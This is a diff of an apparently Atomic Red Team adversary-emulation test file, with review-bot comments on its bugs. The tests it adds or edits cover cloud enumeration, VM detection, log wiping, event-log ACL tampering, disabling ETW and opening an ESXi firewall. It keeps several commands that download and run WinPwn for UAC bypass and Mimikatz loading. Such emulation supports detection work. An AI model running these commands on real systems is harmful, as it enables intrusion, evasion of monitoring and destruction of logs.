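Review bot: the `output_directory` default `"$env:TMPDIR/aws_discovery"` is unreliable for a test whose executor is PowerShell on Windows, where `TMPDIR` is normally unset; the path then expands to `/aws_discovery` on the current drive root, and on Linux hosts without `TMPDIR` the same thing happens. `[System.IO.Path]::GetTempPath()` (or `$env:TEMP` with a fallback) is portable. The test also has no `cleanup_command`, so the enumerated inventory of the account stays on disk after the run; a `Remove-Item -Recurse "#{output_directory}"` cleanup would match the other T1526 tests.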
@@ -57529,7 +57726,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -57547,6 +57744,7 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1595.003
atomic_tests: []
T1591.004:
technique:
+68 -12
View File
@@ -11655,11 +11655,11 @@ defense-evasion:
username:
description: Azure username
type: string
default:
default:
password:
description: Azure password
type: string
default:
default:
event_hub_name:
description: Name of the eventhub
type: string
@@ -11667,11 +11667,11 @@ defense-evasion:
resource_group:
description: Name of the resource group
type: string
default:
default:
name_space_name:
description: Name of the NameSpace
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'Install-Module -Name Az
@@ -25802,7 +25802,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -25854,6 +25854,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.010
atomic_tests: []
T1059.009:
technique:
@@ -27192,6 +27193,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1651
atomic_tests: []
T1059.005:
technique:
@@ -27367,6 +27369,7 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1648
atomic_tests: []
T1204.001:
technique:
@@ -40955,11 +40958,11 @@ collection:
container_name:
description: Container name to search for (optional)
type: string
default:
default:
blob_name:
description: Blob name to search for (optional)
type: string
default:
default:
executor:
command: |
try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
@@ -47519,7 +47522,7 @@ credential-access:
username:
description: Azure AD username
type: string
default:
default:
password:
description: Azure AD password
type: string
@@ -47531,7 +47534,7 @@ credential-access:
subscription_id:
description: Azure subscription id to search
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
@@ -52336,7 +52339,7 @@ discovery:
username:
description: Azure AD username
type: string
default:
default:
password:
description: Azure AD password
type: string
@@ -52348,7 +52351,7 @@ discovery:
subscription_name:
description: Azure subscription name to scan
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'The Get-AzDomainInfo script must exist in PathToAtomicsFolder\..\ExternalPayloads.
@@ -52383,6 +52386,58 @@ discovery:
'
name: powershell
- name: Azure - Enumerate common cloud services
auto_generated_guid: 58f57c8f-db14-4e62-a4d3-5aaf556755d7
description: 'Upon successful execution, this test will enumerate common resources
that are contained within a valid Azure subscription.
'
supported_platforms:
- iaas:azure
input_arguments:
client_id:
description: Azure AD client ID
type: string
default:
client_secret:
description: Azure AD client secret
type: string
default:
tenant_id:
description: Azure AD tenant ID
type: string
default:
cloud:
description: Azure cloud environment
type: string
default: AzureCloud
output_directory:
description: Directory to output results to
type: string
default: "$env:TMPDIR/azure_discovery"
dependency_executor_name: powershell
dependencies:
- description: 'The Az module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name Az -Force
'
executor:
command: |
Import-Module "PathToAtomicsFolder\T1526\src\AzureDiscovery.ps1"
$client_id = "#{client_id}"
$client_secret = "#{client_secret}"
$tenant_id = "#{tenant_id}"
$environment = "#{cloud}"
Set-AzureAuthentication -ClientID $client_id -ClientSecret $client_secret -TenantID $tenant_id -Environment $environment
Get-AzureDiscoveryData -OutputDirectory "#{output_directory}" -Environment $environment
Remove-BlankFiles -OutputDirectory "#{output_directory}"
name: powershell
T1018:
technique:
modified: '2023-08-14T19:08:59.741Z'
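Review bot: "Azure - Enumerate common cloud services" has the same `"$env:TMPDIR/azure_discovery"` default as the AWS test and the same missing `cleanup_command`, so the subscription inventory is left behind; please fix both together. Also, `client_id`, `client_secret` and `tenant_id` use a bare `default:` (YAML null) while the rest of the file uses `default: ''`; keep it consistent so the runner's input handling behaves the same as for the other cloud tests.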
@@ -57593,7 +57648,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -57611,6 +57666,7 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1595.003
atomic_tests: []
T1591.004:
technique:
+9 -5
View File
@@ -20957,7 +20957,7 @@ privilege-escalation:
prereq_command: 'stat "$PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate"
'
get_prereq_command: |-
get_prereq_command: |
cd "$PathToAtomicsFolder/T1098/src/T1098-17/"
terraform init
terraform apply -auto-approve
@@ -25744,7 +25744,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -25796,6 +25796,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.010
atomic_tests: []
T1059.009:
technique:
@@ -27134,6 +27135,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1651
atomic_tests: []
T1059.005:
technique:
@@ -27309,6 +27311,7 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1648
atomic_tests: []
T1204.001:
technique:
@@ -33304,7 +33307,7 @@ persistence:
prereq_command: 'stat "$PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate"
'
get_prereq_command: |-
get_prereq_command: |
cd "$PathToAtomicsFolder/T1098/src/T1098-17/"
terraform init
terraform apply -auto-approve
@@ -57240,7 +57243,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -57258,6 +57261,7 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1595.003
atomic_tests: []
T1591.004:
technique:
@@ -59620,7 +59624,7 @@ impact:
prereq_command: 'stat "$PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate"
'
get_prereq_command: |-
get_prereq_command: |
cd "$PathToAtomicsFolder/T1485/src/T1485-4/"
terraform init
terraform apply -auto-approve
+1729 -265
View File
@@ -771,7 +771,7 @@ defense-evasion:
default: "'%windir%\\System32\\calc.exe'"
executor:
command: rundll32.exe zipfldr.dll,RouteTheCall "#{exe_to_launch}"
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
T1027.009:
@@ -3107,7 +3107,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
name: powershell
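Review bot: dropping `$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'` is safe: nothing in the executor referenced the variable, the `downloadstring` URL on the next line is a literal, and it stays pinned to a specific commit, which is what keeps this test reproducible. The same unused assignment is removed in the two following hunks and the `mimiload` hunk further down; no further change needed there.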
@@ -3118,7 +3117,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
name: powershell
@@ -3129,7 +3127,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
name: powershell
@@ -4819,7 +4816,7 @@ defense-evasion:
Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue
if($error) {echo "Virtualization Environment detected"}
cleanup_command: "$error.clear()\n"
- name: Detect Virtualization Environment (MacOS)
- name: Detect Virtualization Environment via ioreg
auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
description: 'ioreg contains registry entries for all the device drivers in
the system. If it''s a virtual machine, one of the device manufacturer will
@@ -4851,6 +4848,49 @@ defense-evasion:
$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Manufacturer"
$Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Model"
if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}
- name: Detect Virtualization Environment using sysctl (hw.model)
auto_generated_guid: 6beae646-eb4c-4730-95be-691a4094408c
description: |
sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware
but will return the hypervisor name (VMware7,0).
Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(sysctl -n hw.model | grep -v ''Mac'')" != "" ]; then echo
''Virtualization Environment detected''; fi;
'
- name: Check if System Integrity Protection is enabled
auto_generated_guid: 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945
description: "The latest versions of macOS have the System Integrity Protection
feature (SIP). If a sandbox uses a non-signed \nkernel extension for monitoring
purposes the, SIP feature must be disabled to load this kind of kernel extension.\nMalware
may check if the SIP is enabled.\nReference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip\n"
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(csrutil status | grep -v ''enabled'')" != "" ]; then echo
''Possible Virtualization Environment detected''; fi;
'
- name: Detect Virtualization Environment using system_profiler
auto_generated_guid: e04d2e89-de15-4d90-92f9-a335c7337f0f
description: "system_profiler provides system hardware and software configuration
and the Model Identifier should provide the value similar to (sysctl -n hw.model).
\nWe should be able to find whether virtualization is enabled by checking
whether the Model Identifier does not contain \"Mac\".\n"
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier"
| grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected'';
fi;
'
T1070.002:
technique:
x_mitre_platforms:
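Review bot: the three new macOS tests rely on loose substring matches. In "Detect Virtualization Environment using sysctl (hw.model)" and the `system_profiler` variant, `grep -v 'Mac'` treats any model string that contains "Mac" anywhere as native hardware, so a hypervisor that presents a Mac-style model identifier (Apple's own Virtualization framework does) is never flagged; anchoring the pattern, e.g. `grep -vE '^i?Mac'`, is closer to what the description claims. In "Check if System Integrity Protection is enabled", `csrutil status | grep -v 'enabled'` prints "Possible Virtualization Environment detected" whenever csrutil emits any additional line lacking the word "enabled", not only when SIP is off; testing the status line itself, e.g. `csrutil status | grep -q 'status: enabled'`, avoids that false positive.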
@@ -5051,7 +5091,7 @@ defense-evasion:
executor:
command: |
cat /dev/null > /var/log/messages #truncating the file to zero bytes
cat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros)
cat /dev/zero > /var/log/messages #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: System log file deletion via find utility
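Review bot: correcting `/var/lol/messages` to `/var/log/messages` uncovers a problem the typo was masking: `cat /dev/zero > /var/log/messages` never terminates on its own; it writes until the filesystem holding `/var` is full and only then fails, leaving the host with a full disk (and `elevation_required: true` means it really will). A bounded write such as `dd if=/dev/zero of=/var/log/messages bs=1024 count=1024` or `head -c 1M /dev/zero > /var/log/messages` demonstrates the same technique without the denial of service.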
@@ -6687,6 +6727,36 @@ defense-evasion:
'
name: command_prompt
elevation_required: true
- name: SubInAcl Execution
auto_generated_guid: a8568b10-9ab9-4140-a523-1c72e0176924
description: This test simulates an adversary executing the Windows Resource
kit utility SubInAcl. This utility was abused by adversaries in the past in
order to modify access permissions. Upon execution, a process creation log
should be generated indicating successful execution.
supported_platforms:
- windows
input_arguments:
SubInAclDownloadPath:
type: string
default: https://web.archive.org/web/20120528222424if_/http://download.microsoft.com/download/1/7/d/17d82b72-bc6a-4dc8-bfaa-98b37b22b367/subinacl.msi
description: Download URL for SubInAcl
dependency_executor_name: powershell
dependencies:
- description: 'Download subinacl
'
prereq_command: 'if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource
Kits\Tools\subinacl.exe") {exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null
Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi
msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn
executor:
command: '"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"'
name: command_prompt
elevation_required: true
T1574.014:
technique:
modified: '2024-04-28T15:44:25.342Z'
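Review bot: the `prereq_command` of "SubInAcl Execution" can never succeed: `Test-Path "Test-Path C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"` embeds the cmdlet name inside the quoted path, so the check always returns false and the MSI is re-downloaded and re-installed on every run. It should read `if (Test-Path "C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe") {exit 0} else {exit 1}`. Relatedly, `New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory` without `-Force` errors when the folder already exists from a previous run.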
@@ -7819,6 +7889,21 @@ defense-evasion:
'
name: powershell
- name: Clear PowerShell Session History
auto_generated_guid: 22c779cd-9445-4d3e-a136-f75adbf0315f
description: "This technique involves using the Clear-History cmdlet in PowerShell
to remove all records of previously executed commands.\nThis action is often
performed by attackers to eliminate traces of their activities, making incident
detection and forensic \ninvestigation more challenging. By clearing the session
history, adversaries aim to obfuscate their operational footprint.\n"
supported_platforms:
- windows
executor:
command: 'Clear-History
'
name: powershell
elevation_required: false
T1202:
technique:
modified: '2024-10-03T14:47:17.154Z'
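Review bot: the description of "Clear PowerShell Session History" overstates what `Clear-History` does. The cmdlet only empties the current session's in-memory command history; the PSReadLine history file on disk is untouched and remains available to responders. The text ("remove all records of previously executed commands") should say this so the test is not mistaken for a complete anti-forensics action when building detections around it.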
@@ -7961,7 +8046,7 @@ defense-evasion:
default: C:\Windows\System32\calc.exe
executor:
command: Scriptrunner.exe -appvscript "#{payload_path}"
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
- name: Indirect Command Execution - RunMRU Dialog
@@ -8396,7 +8481,7 @@ defense-evasion:
text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()),
key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command,
key); subprocess.call(exec, shell=True)'''
cleanup_command:
cleanup_command:
name: bash
elevation_required: false
T1562:
@@ -10596,7 +10681,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
mimiload -consoleoutput -noninteractive
name: powershell
@@ -11246,6 +11330,66 @@ defense-evasion:
'
name: command_prompt
- name: Modify Event Log Channel Access Permissions via Registry - PowerShell
auto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
ChannelPath:
type: string
default: HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TaskScheduler/Operational
description: Path to the event log service channel to alter
executor:
command: "Set-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value
\"O:SYG:SYD:(D;;0x1;;;WD)\"\nRestart-Service -Name EventLog -Force -ErrorAction
Ignore "
cleanup_command: |-
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
auto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
ChannelPath:
type: string
default: HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\Setup
description: Path to the event log service channel to alter
executor:
command: |-
New-Item -Path #{ChannelPath} -Force
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
cleanup_command: |-
Remove-Item -Path #{ChannelPath} -Force
Restart-Service -Name EventLog -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Modify Event Log Access Permissions via Registry - PowerShell
auto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
CustomSDPath:
type: string
default: HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\System
description: Path to the event log service channel to alter
executor:
command: 'Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"'
cleanup_command: 'Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"'
name: powershell
elevation_required: true
T1218.002:
technique:
x_mitre_platforms:
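Review bot: the cleanup steps in these three tests do not restore the pre-test state. The first test's `cleanup_command` writes a hard-coded SDDL into `ChannelAccess` rather than putting back whatever value was there, so a host with a customised channel ACL is silently changed; capture `(Get-ItemProperty -Path "#{ChannelPath}").ChannelAccess` before the test and restore that. The second test's cleanup, `Remove-Item -Path #{ChannelPath} -Force`, deletes the whole `...\Policies\Microsoft\Windows\EventLog\Setup` key, including any policy values that existed before the test created it. Finally, `-Path #{ChannelPath}` is unquoted in all three executors; the defaults have no spaces, but a user-supplied path with one breaks the command, so quote it.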
@@ -11970,7 +12114,7 @@ defense-evasion:
iptables NOT installed *****\n"; exit 1; fi
'
get_prereq_command: 'echo ""
get_prereq_command: 'sudo apt-get install iptables
'
executor:
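Review bot: the new `get_prereq_command: 'sudo apt-get install iptables'` lacks `-y`, so in a non-interactive run it blocks on the confirmation prompt and the dependency step hangs. It is also Debian-specific while the prereq check above only says "iptables NOT installed"; at minimum use `sudo apt-get install -y iptables`, and consider guarding on `command -v apt-get` so other distributions fail with a clear message instead of a missing-command error.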
@@ -12127,6 +12271,53 @@ defense-evasion:
cleanup_command: Remove-NetFirewallRule -DisplayName "New rule"
name: powershell
elevation_required: true
- name: ESXi - Set Firewall to PASS Traffic
auto_generated_guid: a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d
description: 'This test sets the default ESXi firewall action to PASS instead
of DROP. This allows all incoming and outgoing traffic.
'
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'The plink executable must be found in the ExternalPayloads folder.
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "esxcli network firewall set --default-action true"
'
cleanup_command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "esxcli network firewall set --default-action false"
'
name: command_prompt
elevation_required: false
T1553.003:
technique:
x_mitre_platforms:
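Review bot: `-batch` in the executor and cleanup means plink never prompts, so if the ESXi host key is not already in the PuTTY host key cache the connection is aborted and the test fails without changing anything; state that precondition in the description or expose a `-hostkey` fingerprint as an input argument. Two smaller points: `get_prereq_command` fetches the `latest` plink build with no version pin or hash check, so consider pinning a release, and the `vm_user` description should read `privileged user account`.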
@@ -17116,6 +17307,63 @@ defense-evasion:
'
name: powershell
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry
- Cmd
auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
environment variable to 0 in the HKCU registry using the reg.exe utility.
In order for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul
2>&1
name: command_prompt
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry
- PowerShell
auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
environment variable to 0 in the HKCU registry using PowerShell. In order
for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
-Value 0 -PropertyType "String" -Force
cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
name: powershell
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry
- Cmd
auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
environment variable to 0 in the HKLM registry using the reg.exe utility.
In order for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"
/v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session
Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry
- PowerShell
auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
environment variable to 0 in the HKLM registry using PowerShell. In order
for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session
Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String"
-Force
cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session
Manager\Environment" -Name COMPlus_ETWEnabled
name: powershell
elevation_required: true
T1562.007:
technique:
modified: '2024-10-16T19:38:57.374Z'
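Review bot: each cleanup here removes `COMPlus_ETWEnabled` outright instead of restoring it, so on a host that already carried that value (for example from a diagnostics or hardening configuration) cleanup leaves a different state than the test found. Record the prior value in the executor and put it back in cleanup, or say in the descriptions that any pre-existing value is deleted. The HKLM variants correctly carry `elevation_required: true`; the HKCU variants omit the field, which is fine for the user hive but worth stating as `elevation_required: false` for consistency with the other tests in this hunk.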
@@ -17484,7 +17732,7 @@ defense-evasion:
description: Ticket file name usually format of 'id-username\@domain.kirbi'
(e.g. can be dumped by "sekurlsa::tickets /export" module)
type: string
default:
default:
mimikatz_exe:
description: Path of the Mimikatz binary
type: path
@@ -18121,6 +18369,7 @@ defense-evasion:
Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
Stop-process -name "hello" -Force -ErrorAction ignore
name: powershell
elevation_required: true
- name: Remove the Zone.Identifier alternate data stream
auto_generated_guid: 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9
description: |
@@ -22059,11 +22308,11 @@ defense-evasion:
username:
description: office-365 username
type: string
default:
default:
password:
description: office-365 password
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
@@ -22184,8 +22433,7 @@ defense-evasion:
supported_platforms:
- windows
executor:
command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
-consoleoutput -noninteractive "
name: powershell
- name: Tamper with Windows Defender ATP using Aliases - PowerShell
